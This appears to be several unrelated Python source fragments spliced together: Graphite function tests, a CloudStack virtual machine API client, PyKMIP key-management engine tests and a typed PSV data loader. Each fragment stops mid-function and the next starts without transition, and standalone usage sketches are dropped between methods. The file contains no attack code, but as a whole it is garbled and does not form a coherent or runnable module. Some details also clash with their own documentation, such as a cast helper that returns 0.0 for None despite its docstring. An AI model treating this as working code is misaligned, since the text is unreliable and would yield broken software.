seriesList = self._generate_series_list()
value = 5
results = functions.removeAboveValue({}, seriesList, value)
for i, result in enumerate(results):
self.assertEqual(return_greater(result, value), [])
expected_name = "removeAboveValue(collectd.test-db{0}.load.value, 5)".format(i + 1)
self.assertEqual(expected_name, result.name)
def test_remove_above_value_float(self):
seriesList = self._generate_series_list()
value = 0.1
results = functions.removeAboveValue({}, seriesList, value)
for i, result in enumerate(results):
self.assertEqual(return_greater(result, value), [])
expected_name = "removeAboveValue(collectd.test-db{0}.load.value, 0.1)".format(i + 1)
self.assertEqual(expected_name, result.name)
def test_remove_below_value(self):
seriesList = self._generate_series_list()
value = 5
results = functions.removeBelowValue({}, seriesList, value)
for i, result in enumerate(results):
self.assertEqual(return_less(result, value), [])
expected_name = "removeBelowValue(collectd.test-db{0}.load.value, 5)".format(i + 1)
self.assertEqual(expected_name, result.name)
def test_remove_below_value_float(self):
seriesList = self._generate_series_list()
value = 0.1
results = functions.removeBelowValue({}, seriesList, value)
for i, result in enumerate(results):
self.assertEqual(return_less(result, value), [])
expected_name = "removeBelowValue(collectd.test-db{0}.load.value, 0.1)".format(i + 1)
self.assertEqual(expected_name, result.name)
def test_limit(self):
seriesList = self._generate_series_list()
limit = len(seriesList) - 1
results = functions.limit({}, seriesList, limit)
self.assertEqual(len(results), limit,
"More than {0} results returned".format(limit),
)
def _verify_series_options(self, seriesList, name, value):
"""
Verify a given option is set and True for each series in a
series list
"""
for series in seriesList:
self.assertIn(name, series.options)
options for keys:
id - The ID of the virtual machine
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('destroyVirtualMachine', args)
def rebootVirtualMachine(self, args={}):
'''
Reboots a virtual machine.
args - A dictionary. The following are options for keys:
id - The ID of the virtual machine
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('rebootVirtualMachine', args)
def startVirtualMachine(self, args={}):
'''
Starts a virtual machine.
args - A dictionary. The following are options for keys:
id - The ID of the virtual machine
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('startVirtualMachine', args)
def stopVirtualMachine(self, args={}):
'''
Stops a virtual machine.
args - A dictionary. The following are options for keys:
id - The ID of the virtual machine
forced - Force stop the VM. The caller knows the VM is stopped.
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('stopVirtualMachine', args)
def resetPasswordForVirtualMachine(self, args={}):
'''
Resets the password for a virtual machine. The virtual machine must be in a
"Stopped" state and the template must already support this feature for this
command to take effect. [async]
args - A dictionary. The following are options for keys:
id - The ID of the virtual machine
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('resetPasswordForVirtualMachine', args)
def changeServiceForVirtualMachine(self, args={}):
'''
Changes the service offering for a virtual machine. The virtual machine must be
in a "Stopped" state for this command to take effect.
args - A dictionary. The following are options for keys:
id - The ID of the virtual machine
serviceofferingid - the service offering ID to apply to the virtual machine
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
if 'serviceofferingid' not in args:
raise RuntimeError("Missing required argument 'serviceofferingid'")
return self.request('changeServiceForVirtualMachine', args)
def updateVirtualMachine(self, args={}):
'''
Updates parameters of a virtual machine.
args - A dictionary. The following are options for keys:
id - The ID of the virtual machine
displayname - user generated name
group - group of the virtual machine
haenable - true if high-availability is enabled for the virtual machine,
false otherwise
ostypeid - the ID of the OS type that best represents this VM.
userdata - an optional binary data that can be sent to the virtual machine
upon a successful deployment. This binary data must be base64 encoded before
adding it to the request. Currently only HTTP GET is supported. Using HTTP GET
(via querystring), you can send up to 2KB of data after base64 encoding.
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('updateVirtualMachine', args)
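# A minimal usage sketch for the userdata note above: the payload must be
# base64-encoded and, when sent via HTTP GET, stay under 2KB after encoding.
# The client instance `api` and the VM id below are hypothetical.
import base64

user_data = base64.b64encode(b'#!/bin/sh\necho "reconfigured on update"\n').decode('ascii')
assert len(user_data) <= 2048, 'userdata exceeds the 2KB GET limit'
api.updateVirtualMachine({
    'id': 'vm-1234',           # hypothetical VM id
    'displayname': 'web-01',
    'userdata': user_data,     # base64-encoded, as the API requires
})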
def recoverVirtualMachine(self, args={}):
'''
Recovers a virtual machine.
args - A dictionary. The following are options for keys:
id - The ID of the virtual machine
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('recoverVirtualMachine', args)
def listVirtualMachines(self, args={}):
'''
List the virtual machines owned by the account.
args - A dictionary. The following are options for keys:
account - List resources by account. Must be used with the domainId
parameter.
details - comma separated list of host details requested, value can be a
list of [all, group, nics, stats, secgrp, tmpl, servoff, iso, volume, min]. If
no parameter is passed in, the details will be defaulted to all
domainid - list only resources belonging to the domain specified
forvirtualnetwork - list by network type; true if need to list vms using
Virtual Network, false otherwise
groupid - the group ID
hostid - the host ID
hypervisor - the target hypervisor for the template
id - the ID of the virtual machine
isrecursive - defaults to false, but if true, lists all resources from the
parent specified by the domainId till leaves.
keyword - List by keyword
listall - If set to false, list only resources belonging to the command's
caller; if set to true - list resources that the caller is authorized to see.
Default value is false
name - name of the virtual machine
networkid - list by network id
page -
pagesize -
podid - the pod ID
projectid - list firewall rules by project
state - state of the virtual machine
storageid - the storage ID where vm's volumes belong to
zoneid - the availability zone ID
page - Pagination
'''
return self.request('listVirtualMachines', args)
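# A minimal usage sketch for listVirtualMachines. The client instance `api`,
# the domain id, and the response shape are assumptions; CloudStack list
# responses typically nest results under a 'virtualmachine' key, but verify
# against your deployment.
response = api.listVirtualMachines({
    'state': 'Running',      # only running VMs
    'domainid': 'dom-42',    # hypothetical domain id
    'listall': 'true',
})
for vm in response.get('virtualmachine', []):
    print(vm.get('id'), vm.get('name'), vm.get('state'))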
def getVMPassword(self, args={}):
'''
Returns an encrypted password for the VM
args - A dictionary. The following are options for keys:
id - The ID of the virtual machine
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('getVMPassword', args)
def migrateVirtualMachine(self, args={}):
'''
Attempts Migration of a VM to a different host or Root volume of the vm to a
different storage pool
args - A dictionary. The following are options for keys:
virtualmachineid - the ID of the virtual machine
hostid - Destination Host ID to migrate VM to. Required for live migrating a
VM from host to host
storageid - Destination storage pool ID to migrate VM volumes to. Required
for migrating the root disk volume
'''
if 'virtualmachineid' not in args:
raise RuntimeError("Missing required argument 'virtualmachineid'")
return self.request('migrateVirtualMachine', args)
def assignVirtualMachine(self, args={}):
'''
Move a user VM to another user under same domain.
args - A dictionary. The following are options for keys:
account - account name of the new VM owner.
domainid - domain id of the new VM owner.
virtualmachineid - the vm ID of the user VM to be moved
networkids - list of network ids that will be part of VM network after move
in advanced network setting.
securitygroupids - comma separated list of security group ids that will
be applied to the virtual machine. Should be passed only when vm is moved in a
zone with Basic Network support.
'''
if 'account' not in args:
raise RuntimeError("Missing required argument 'account'")
if 'domainid' not in args:
raise RuntimeError("Missing required argument 'domainid'")
if 'virtualmachineid' not in args:
raise RuntimeError("Missing required argument 'virtualmachineid'")
return self.request('assignVirtualMachine', args)
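# A minimal usage sketch for assignVirtualMachine showing the three required
# arguments; the client instance `api` and every identifier are hypothetical.
api.assignVirtualMachine({
    'account': 'new-owner',             # required: account name of the new VM owner
    'domainid': 'dom-42',               # required: domain id of the new VM owner
    'virtualmachineid': 'vm-1234',      # required: the user VM to move
    'securitygroupids': 'sg-1,sg-2',    # only when moving within a Basic Network zone
})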
def restoreVirtualMachine(self, args={}):
'''
Restore a VM to original template or specific snapshot
args - A dictionary. The following are options for keys:
virtualmachineid - Virtual Machine ID
'''
if 'virtualmachineid' not in args:
raise RuntimeError("Missing required argument 'virtualmachineid'")
return self.request('restoreVirtualMachine', args)
def addTrafficType(self, args={}):
'''
Adds traffic type to a physical network
args - A dictionary. The following are options for keys:
physicalnetworkid - the Physical Network ID
traffictype - the trafficType to be added to the physical network
kvmnetworklabel - The network name label of the physical device dedicated to
this traffic on a KVM host
vlan - The VLAN id to be used for Management traffic by VMware host
vmwarenetworklabel - The network name label of the physical device dedicated
to this traffic on a VMware host
xennetworklabel - The network name label of the physical device dedicated to
this traffic on a XenServer host
'''
if 'physicalnetworkid' not in args:
raise RuntimeError("Missing required argument 'physicalnetworkid'")
if 'traffictype' not in args:
raise RuntimeError("Missing required argument 'traffictype'")
return self.request('addTrafficType', args)
def deleteTrafficType(self, args={}):
'''
Deletes traffic type of a physical network
args - A dictionary. The following are options for keys:
id - traffic type id
'''
if 'id' not in args:
raise RuntimeError("Missing required argument 'id'")
return self.request('deleteTrafficType', args)
def listTrafficTypes(self, args={}):
'''
Lists traffic types of a given physical network.
args - A dictionary. The following are options for keys:
physicalnetworkid - the Physical Network ID
keyword - List by keyword
page -
pagesize -
page - Pagination
'''
if 'physicalnetworkid' not in args:
raise RuntimeError("Missing required argument 'physicalnetworkid'")
return self.request('listTrafficTypes', args)
def updateTrafficType(self, args={}):
'''
Updates traffic type of a physical network
args - A dictionary. The following are
)
args = (
managed_object,
('Digest', [name_a.attribute_value, name_b.attribute_value])
)
regex = "The Digest attribute is unsupported."
six.assertRaisesRegex(
self,
exceptions.InvalidField,
regex,
e._set_attribute_on_managed_object,
*args
)
# Test that a set attribute cannot be overwritten.
length = attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_LENGTH,
128
)
args = (
managed_object,
('Cryptographic Length', length.attribute_value)
)
regex = "Cannot overwrite the Cryptographic Length attribute."
six.assertRaisesRegex(
self,
exceptions.InvalidField,
regex,
e._set_attribute_on_managed_object,
*args
)
# Test that an unsupported attribute cannot be set.
object_group = attribute_factory.create_attribute(
enums.AttributeType.OBJECT_GROUP,
'Test Group'
)
args = (
managed_object,
('Object Group', object_group.attribute_value)
)
regex = "The Object Group attribute is unsupported."
six.assertRaisesRegex(
self,
exceptions.InvalidField,
regex,
e._set_attribute_on_managed_object,
*args
)
def test_is_allowed_by_operation_policy(self):
"""
Test that an allowed operation is correctly allowed by the operation
policy.
"""
e = engine.KmipEngine()
e._operation_policies = {
'test': {
enums.ObjectType.SYMMETRIC_KEY: {
enums.Operation.GET: enums.Policy.ALLOW_OWNER
}
}
}
is_allowed = e._is_allowed_by_operation_policy(
'test',
'test',
'test',
enums.ObjectType.SYMMETRIC_KEY,
enums.Operation.GET
)
self.assertTrue(is_allowed)
def test_is_allowed_by_operation_policy_blocked(self):
"""
Test that a disallowed operation is correctly blocked by the operation
policy.
"""
e = engine.KmipEngine()
e._operation_policies = {
'test': {
enums.ObjectType.SYMMETRIC_KEY: {
enums.Operation.GET: enums.Policy.ALLOW_OWNER
}
}
}
is_allowed = e._is_allowed_by_operation_policy(
'test',
'random',
'test',
enums.ObjectType.SYMMETRIC_KEY,
enums.Operation.GET
)
self.assertFalse(is_allowed)
def test_is_allowed_by_operation_public(self):
"""
Test that a public operation is allowed by the operation policy.
"""
e = engine.KmipEngine()
e._operation_policies = {
'test': {
enums.ObjectType.SYMMETRIC_KEY: {
enums.Operation.GET: enums.Policy.ALLOW_ALL
}
}
}
is_allowed = e._is_allowed_by_operation_policy(
'test',
'test',
'test',
enums.ObjectType.SYMMETRIC_KEY,
enums.Operation.GET
)
self.assertTrue(is_allowed)
is_allowed = e._is_allowed_by_operation_policy(
'test',
'random',
'test',
enums.ObjectType.SYMMETRIC_KEY,
enums.Operation.GET
)
self.assertTrue(is_allowed)
def test_is_allowed_by_operation_block_all(self):
"""
Test that a blocked operation is blocked by the operation policy.
"""
e = engine.KmipEngine()
e._operation_policies = {
'test': {
enums.ObjectType.SYMMETRIC_KEY: {
enums.Operation.GET: enums.Policy.DISALLOW_ALL
}
}
}
is_allowed = e._is_allowed_by_operation_policy(
'test',
'test',
'test',
enums.ObjectType.SYMMETRIC_KEY,
enums.Operation.GET
)
self.assertFalse(is_allowed)
is_allowed = e._is_allowed_by_operation_policy(
'test',
'random',
'test',
enums.ObjectType.SYMMETRIC_KEY,
enums.Operation.GET
)
self.assertFalse(is_allowed)
def test_is_allowed_by_operation_safety_check(self):
"""
Test that an unknown operation is blocked by the operation policy.
"""
e = engine.KmipEngine()
e._operation_policies = {
'test': {
enums.ObjectType.SYMMETRIC_KEY: {
enums.Operation.GET: 'unknown value'
}
}
}
is_allowed = e._is_allowed_by_operation_policy(
'test',
'test',
'test',
enums.ObjectType.SYMMETRIC_KEY,
enums.Operation.GET
)
self.assertFalse(is_allowed)
is_allowed = e._is_allowed_by_operation_policy(
'test',
'random',
'test',
enums.ObjectType.SYMMETRIC_KEY,
enums.Operation.GET
)
self.assertFalse(is_allowed)
def test_is_allowed_by_operation_policy_nonexistent_policy(self):
"""
Test that a check with a non-existent policy yields a logging warning
and a blocked operation.
"""
e = engine.KmipEngine()
e._logger = mock.MagicMock()
policy = 'nonexistent-policy'
is_allowed = e._is_allowed_by_operation_policy(
policy,
'test',
'test',
enums.ObjectType.SYMMETRIC_KEY,
enums.Operation.GET
)
self.assertFalse(is_allowed)
e._logger.warning.assert_called_once_with(
"The '{0}' policy does not exist.".format(policy)
)
def test_is_allowed_by_operation_policy_not_object_applicable(self):
"""
Test that a check for an object with a non-applicable policy yields
a logging warning and a blocked operation.
"""
e = engine.KmipEngine()
e._logger = mock.MagicMock()
e._operation_policies = {
'test': {
enums.ObjectType.SYMMETRIC_KEY: {
enums.Operation.GET: enums.Policy.ALLOW_OWNER
}
}
}
policy = 'test'
object_type = enums.ObjectType.PRIVATE_KEY
is_allowed = e._is_allowed_by_operation_policy(
policy,
'test',
'test',
object_type,
enums.Operation.GET
)
self.assertFalse(is_allowed)
e._logger.warning.assert_called_once_with(
"The '{0}' policy does not apply to {1} objects.".format(
policy,
e._get_enum_string(object_type)
)
)
def test_is_allowed_by_operation_policy_not_applicable(self):
"""
Test that a check with a non-applicable policy yields a logging
warning and a blocked operation.
"""
e = engine.KmipEngine()
e._logger = mock.MagicMock()
e._operation_policies = {
'test': {
enums.ObjectType.SYMMETRIC_KEY: {
enums.Operation.GET: enums.Policy.ALLOW_OWNER
}
}
}
policy = 'test'
object_type = enums.ObjectType.SYMMETRIC_KEY
operation = enums.Operation.CREATE
is_allowed = e._is_allowed_by_operation_policy(
policy,
'test',
'test',
object_type,
operation
)
self.assertFalse(is_allowed)
e._logger.warning.assert_called_once_with(
"The '{0}' policy does not apply to {1} operations on {2} "
"objects.".format(
policy,
e._get_enum_string(operation),
e._get_enum_string(object_type)
)
)
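# A condensed sketch of the decision rule the policy tests above exercise.
# This is an illustration inferred from the tests, not the engine's actual
# _is_allowed_by_operation_policy implementation.
def is_allowed(policies, policy_name, client_identity, object_owner, object_type, operation):
    object_policies = policies.get(policy_name)
    if object_policies is None:
        return False                              # nonexistent policy -> warn and block
    operation_policies = object_policies.get(object_type)
    if operation_policies is None:
        return False                              # policy does not cover this object type
    permission = operation_policies.get(operation)
    if permission == enums.Policy.ALLOW_ALL:
        return True                               # public operation
    if permission == enums.Policy.ALLOW_OWNER:
        return client_identity == object_owner    # owner-only operation
    return False                                  # DISALLOW_ALL, unknown, or missing operation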
def test_get_object_with_access_controls(self):
"""
Test that a disallowed object access request is handled correctly.
"""
e = engine.KmipEngine()
e._data_store = self.engine
e._data_store_session_factory = self.session_factory
e._data_session = e._data_store_session_factory()
e._logger = mock.MagicMock()
e._client_identity = 'test'
obj_a = pie_objects.OpaqueObject(b'', enums.OpaqueDataType.NONE)
obj_a._owner = 'admin'
e._data_session.add(obj_a)
e._data_session.commit()
e._data_session = e._data_store_session_factory()
id_a = str(obj_a.unique_identifier)
# Test by specifying the ID of the object to retrieve and the
# operation context.
args = [id_a, enums.Operation.GET]
six.assertRaisesRegex(
self,
exceptions.ItemNotFound,
"Could not locate object: {0}".format(id_a),
e._get_object_with_access_controls,
*args
)
def test_create(self):
"""
Test that a Create request can be processed correctly.
"""
e = engine.KmipEngine()
e._data_store = self.engine
e._data_store_session_factory = self.session_factory
e._data_session = e._data_store_session_factory()
e._logger = mock.MagicMock()
attribute_factory = factory.AttributeFactory()
# Build Create request
object_type = attributes.ObjectType(enums.ObjectType.SYMMETRIC_KEY)
template_attribute = objects.TemplateAttribute(
attributes=[
attribute_factory.create_attribute(
enums.AttributeType.NAME,
attributes.Name.create(
'Test Symmetric Key',
enums.NameType.UNINTERPRETED_TEXT_STRING
)
),
attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_ALGORITHM,
enums.CryptographicAlgorithm.AES
),
attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_LENGTH,
256
),
attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_USAGE_MASK,
[
enums.CryptographicUsageMask.ENCRYPT,
enums.CryptographicUsageMask.DECRYPT
]
),
attribute_factory.create_attribute(
enums.AttributeType.OPERATION_POLICY_NAME,
'test'
)
]
)
payload = create.CreateRequestPayload(
object_type,
template_attribute
)
response_payload = e._process_create(payload)
e._data_session.commit()
e._data_session = e._data_store_session_factory()
e._logger.info.assert_any_call(
"Processing operation: Create"
)
uid = response_payload.unique_identifier.value
self.assertEqual('1', uid)
# Retrieve the stored object and verify all attributes were set
# appropriately.
symmetric_key = e._data_session.query(
pie_objects.SymmetricKey
).filter(
pie_objects.ManagedObject.unique_identifier == uid
).one()
self.assertEqual(
enums.KeyFormatType.RAW,
symmetric_key.key_format_type
)
self.assertEqual(1, len(symmetric_key.names))
self.assertIn('Test Symmetric Key', symmetric_key.names)
self.assertEqual(256, len(symmetric_key.value) * 8)
self.assertEqual(
enums.CryptographicAlgorithm.AES,
symmetric_key.cryptographic_algorithm
)
self.assertEqual(256, symmetric_key.cryptographic_length)
self.assertEqual(2, len(symmetric_key.cryptographic_usage_masks))
self.assertIn(
enums.CryptographicUsageMask.ENCRYPT,
symmetric_key.cryptographic_usage_masks
)
self.assertIn(
enums.CryptographicUsageMask.DECRYPT,
symmetric_key.cryptographic_usage_masks
)
self.assertEqual('test', symmetric_key.operation_policy_name)
self.assertIsNotNone(symmetric_key.initial_date)
self.assertNotEqual(0, symmetric_key.initial_date)
self.assertEqual(uid, e._id_placeholder)
def test_create_unsupported_object_type(self):
"""
Test that an InvalidField error is generated when attempting to
create an unsupported object type.
"""
e = engine.KmipEngine()
e._data_store = self.engine
e._data_store_session_factory = self.session_factory
e._data_session = e._data_store_session_factory()
e._logger = mock.MagicMock()
object_type = attributes.ObjectType(enums.ObjectType.PUBLIC_KEY)
payload = create.CreateRequestPayload(
object_type
)
args = (payload, )
regex = "Cannot create a PublicKey object with the Create operation."
six.assertRaisesRegex(
self,
exceptions.InvalidField,
regex,
e._process_create,
*args
)
e._logger.info.assert_any_call(
"Processing operation: Create"
)
def test_create_omitting_attributes(self):
"""
Test that InvalidField errors are generated when trying to create
a symmetric key without required attributes.
"""
e = engine.KmipEngine()
e._data_store = self.engine
e._data_store_session_factory = self.session_factory
e._data_session = e._data_store_session_factory()
e._logger = mock.MagicMock()
attribute_factory = factory.AttributeFactory()
# Test the error for omitting the Cryptographic Algorithm
object_type = attributes.ObjectType(enums.ObjectType.SYMMETRIC_KEY)
template_attribute = objects.TemplateAttribute(
attributes=[
attribute_factory.create_attribute(
enums.AttributeType.NAME,
attributes.Name.create(
'Test Symmetric Key',
enums.NameType.UNINTERPRETED_TEXT_STRING
)
),
attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_LENGTH,
256
),
attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_USAGE_MASK,
[
enums.CryptographicUsageMask.ENCRYPT,
enums.CryptographicUsageMask.DECRYPT
]
)
]
)
payload = create.CreateRequestPayload(
object_type,
template_attribute
)
args = (payload, )
regex = (
"The cryptographic algorithm must be specified as an attribute."
)
six.assertRaisesRegex(
self,
exceptions.InvalidField,
regex,
e._process_create,
*args
)
e._logger.info.assert_any_call(
"Processing operation: Create"
)
e._logger.reset_mock()
# Test the error for omitting the Cryptographic Length
object_type = attributes.ObjectType(enums.ObjectType.SYMMETRIC_KEY)
template_attribute = objects.TemplateAttribute(
attributes=[
attribute_factory.create_attribute(
enums.AttributeType.NAME,
attributes.Name.create(
'Test Symmetric Key',
enums.NameType.UNINTERPRETED_TEXT_STRING
)
),
attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_ALGORITHM,
enums.CryptographicAlgorithm.AES
),
attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_USAGE_MASK,
[
enums.CryptographicUsageMask.ENCRYPT,
enums.CryptographicUsageMask.DECRYPT
]
)
]
)
payload = create.CreateRequestPayload(
object_type,
template_attribute
)
args = (payload, )
regex = (
"The cryptographic length must be specified as an attribute."
)
six.assertRaisesRegex(
self,
exceptions.InvalidField,
regex,
e._process_create,
*args
)
e._logger.info.assert_any_call(
"Processing operation: Create"
)
e._logger.reset_mock()
# Test the error for omitting the Cryptographic Usage Mask
object_type = attributes.ObjectType(enums.ObjectType.SYMMETRIC_KEY)
template_attribute = objects.TemplateAttribute(
attributes=[
attribute_factory.create_attribute(
enums.AttributeType.NAME,
attributes.Name.create(
'Test Symmetric Key',
enums.NameType.UNINTERPRETED_TEXT_STRING
)
),
attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_ALGORITHM,
enums.CryptographicAlgorithm.AES
),
attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_LENGTH,
256
)
]
)
payload = create.CreateRequestPayload(
object_type,
template_attribute
)
args = (payload, )
regex = (
"The cryptographic usage mask must be specified as an attribute."
)
six.assertRaisesRegex(
self,
exceptions.InvalidField,
regex,
e._process_create,
*args
)
e._logger.info.assert_any_call(
"Processing operation: Create"
)
e._logger.reset_mock()
def test_create_key_pair(self):
"""
Test that a CreateKeyPair request can be processed correctly.
"""
e = engine.KmipEngine()
e._data_store = self.engine
e._data_store_session_factory = self.session_factory
e._data_session = e._data_store_session_factory()
e._logger = mock.MagicMock()
attribute_factory = factory.AttributeFactory()
common_template = objects.CommonTemplateAttribute(
attributes=[
attribute_factory.create_attribute(
enums.AttributeType.NAME,
attributes.Name.create(
'Test Asymmetric Key',
enums.NameType.UNINTERPRETED_TEXT_STRING
)
),
attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_ALGORITHM,
enums.CryptographicAlgorithm.RSA
),
attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_LENGTH,
2048
)
]
)
public_template = objects.PublicKeyTemplateAttribute(
attributes=[
attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_USAGE_MASK,
[
enums.CryptographicUsageMask.ENCRYPT
]
)
]
)
private_template = objects.PrivateKeyTemplateAttribute(
attributes=[
attribute_factory.create_attribute(
enums.AttributeType.CRYPTOGRAPHIC_USAGE_MASK,
[
enums.CryptographicUsageMask.DECRYPT
]
)
]
)
payload = create_key_pair.CreateKeyPairRequestPayload(
common_template,
private_template,
public_template
)
response_payload = e._process_create_key_pair(payload)
e._data_session.commit()
e._data_session = e._data_store_session_factory()
e._logger.info.assert_any_call(
"Processing operation: CreateKeyPair"
)
public_id = response_payload.public_key_uuid.value
self.assertEqual('1', public_id)
private_id = response_payload.private_key_uuid.value
self.assertEqual('2', private_id)
# Retrieve the stored public key and verify all attributes were set
# appropriately.
public_key = e._data_session.query(
pie_objects.PublicKey
).filter(
pie_objects.ManagedObject.unique_identifier == public_id
).one()
self.assertEqual(
enums.KeyFormatType.PKCS_1,
public_key.key_format_type
)
self.assertEqual(1, len(public_key.names))
self.assertIn('Test Asymmetric Key', public_key.names)
self.assertEqual(
enums.CryptographicAlgorithm.RSA,
public_key.cryptographic_algorithm
)
self.assertEqual(2048, public_key.cryptographic_length)
self.assertEqual(1, len(public_key.cryptographic_usage_masks))
self.assertIn(
enums.CryptographicUsageMask.ENCRYPT,
public_key.cryptographic_usage_masks
)
self.assertEqual('default', public_key.operation_policy_name)
self.assertIsNotNone(public_key.initial_date)
self.assertNotEqual(0, public_key.initial_date)
# Retrieve the stored private key and verify all attributes were set
# appropriately.
private_key = e._data_session.query(
pie_objects.PrivateKey
).filter(
pie_objects.ManagedObject.unique_identifier == private_id
).one()
self.assertEqual(
enums.KeyFormatType.PKCS_8,
private_key.key_format_type
)
self.assertEqual(1, len(private_key.names))
self.assertIn('Test Asymmetric Key', private_key.names)
self.assertEqual(
enums.CryptographicAlgorithm.RSA,
private_key.cryptographic_algorithm
then will load the analyze table.
"""
return_type = None
if type(source_tables) == list:
return_type = 'list'
elif type(source_tables) == str:
# single table (as string) passed... expecting to return full table
source_tables = [source_tables]
return_type = 'dataframe'
elif type(source_tables) == dict:
# single table (as dict) passed... likely with subsetting query, but not req'd
source_tables = [source_tables]
return_type = 'dataframe'
source_tables_proper = []
reassign = False
for s in source_tables:
if type(s) == str:
# convert list of strings into a list of dicts
reassign = True
d = {}
d['table_name'] = s
source_tables_proper.append(d)
if reassign:
# replace source_tables with reformatted version
source_tables = source_tables_proper
dfs = []
if fetch is True:
if not conn:
# create connection object
try:
rpc = Connect()
except:
logger.exception('Could not connect via RPC')
return False
conn = Connection(project=rpc.project_id)
for s in source_tables:
# create table objects if they don't exist
if s.get('table_object') == None:
s['table_object'] = Table(conn, s.get('table_name'))
downloads = download(source_tables, configuration=configuration, conn=conn, clean=clean)
for d in downloads:
df = d.get('df')
name_of_df = '{0}.psv'.format(d.get('name'))
if name_of_df.startswith('/'):
name_of_df = name_of_df[1:]
if cache_locally is True:
with open(os.path.join(configuration['LOCAL_STORAGE'], name_of_df), 'w') as f:
save_typed_psv(df, f)
dfs.append(df)
else:
for s in source_tables:
source_table = '{0}.psv'.format(s.get('table_name'))
source_path = os.path.join(configuration['LOCAL_STORAGE'], source_table)
df = load_typed_psv(source_path)
dfs.append(df)
if return_type == 'dataframe':
return dfs[0]
else:
return dfs
def load_new(source_tables, sep='|', fetch=True, cache_locally=False, configuration=None, connection=None):
"""Load frame(s) from requested source
If local, will load from the typed_psv. If Analyze, then will load the analyze table.
TODO: Make it fetch from analyze table....really this should be assimilated with dwim once dwim works again.
TODO: Make it go to analyze and cache locally, if requested to do so.
"""
if connection:
configuration['project_id'] = connection.project_id
if fetch is True:
download(source_tables, configuration)
dfs = []
for source_table in source_tables:
_, table_name = posixpath.split(source_table)
source_path = '{}/{}.psv'.format(configuration['LOCAL_STORAGE'], source_table)
df = load_typed_psv(source_path)
dfs.append(df)
return dfs
def dtype_from_sql(sql):
"""Gets a pandas dtype from a SQL data type
Args:
sql (str): The SQL data type
Returns:
str: the pandas dtype equivalent of `sql`
"""
mapping = {
'boolean': 'bool',
'text': 'object',
'smallint': 'int16',
'integer': 'int32',
'bigint': 'int64',
'numeric': 'float64',
'timestamp': 'datetime64[s]',
'interval': 'timedelta64[s]',
'date': 'datetime64[s]',
'time': 'datetime64[s]',
}
return mapping.get(str(sql).lower(), None)
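# Quick examples of the mapping above (case-insensitive; unmapped SQL types
# fall through to None):
assert dtype_from_sql('NUMERIC') == 'float64'
assert dtype_from_sql('timestamp') == 'datetime64[s]'
assert dtype_from_sql('uuid') is None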
def sturdy_cast_as_float(input_val):
"""
Force a value to be of type 'float'. Sturdy and unbreakable.
Works like data_helpers.cast_as_float except it returns NaN and None
in cases where such seems appropriate, whereas the former forces to 0.0.
"""
if input_val is None:
return 0.0
try:
if np.isnan(input_val):
return float('nan')  # propagate NaN rather than falling through and implicitly returning None
else:
try:
return float(input_val)
except ValueError:
return None
except:
try:
return float(input_val)
except ValueError:
return None
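# Illustrative behavior checks for sturdy_cast_as_float (with the NaN branch
# above returning NaN rather than falling through):
assert sturdy_cast_as_float(None) == 0.0
assert sturdy_cast_as_float('3.14') == 3.14
assert sturdy_cast_as_float('not-a-number') is None
assert np.isnan(sturdy_cast_as_float(float('nan')))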
def converter_from_sql(sql):
"""Gets a pandas converter from a SQL data type
Args:
sql (str): The SQL data type
Returns:
str: the pandas converter
"""
mapping = {
'boolean': bool,
'text': str,
'smallint': int,
'integer': int,
'bigint': int,
#'numeric': float, #dh.cast_as_float,
#'numeric': dh.cast_as_float,
'numeric': sturdy_cast_as_float,
'timestamp': pd.datetime,
'interval': pd.datetime,
'date': pd.datetime,
'time': pd.datetime,
}
return mapping.get(str(sql).lower(), str(sql).lower())
def load_typed_psv(infile, sep='|', **kwargs):
""" Loads a typed psv into a pandas dataframe. If the psv isn't typed,
loads it anyway.
Args:
infile (str): The path to the input file
sep (str, optional): The separator used in the input file
"""
#TODO: for now we just ignore extra kwargs - we accept them to make it a
#little easier to convert old to_csvs and read_csvs. In the future, we
#should probably pass as many of them as possible on to to_csv/read_csv -
#the only issue is we have to make sure the header stays consistent.
if isinstance(infile, six.string_types):
if os.path.exists(infile):
buf = open(infile, 'rb')
else:
logger.exception('File does not exist: {0}'.format(infile))
return False
else:
buf = infile
try:
headerIO = six.BytesIO(buf.readline()) # The first line needs to be in a separate iterator, so that we don't mix read and iter.
header = next(csv.reader(headerIO, delimiter=sep)) # Just parse that first line as a csv row
names_and_types = [h.split(CSV_TYPE_DELIMITER) for h in header]
column_names = [n[0] for n in names_and_types]
try:
dtypes = {
name: dtype_from_sql(sqltype)
for name, sqltype in names_and_types
}
except ValueError:
# Missing sqltype - looks like this is a regular, untyped csv.
# Let's hope that first line was its header.
dtypes = None
converters={}
#for name, sqltype in names_and_types:
#converter = converter_from_sql(sqltype)
#if converter:
#converters[name] = converter
try:
converters = {
name: converter_from_sql(sqltype)
for name, sqltype in names_and_types
}
except ValueError:
# Missing sqltype - looks like this is a regular, untyped csv.
# Let's hope that first line was its header.
converters = None
# This will start on the second line, since we already read the first line.
#return pd.read_csv(buf, header=None, names=column_names, dtype=dtypes, sep=sep)
na_values = [
#'', # This was here, and then commented out, and I'm putting it back in 20180824. ***
# # If it isn't here, we fail when attempting to import a delimited file of type 'numeric'
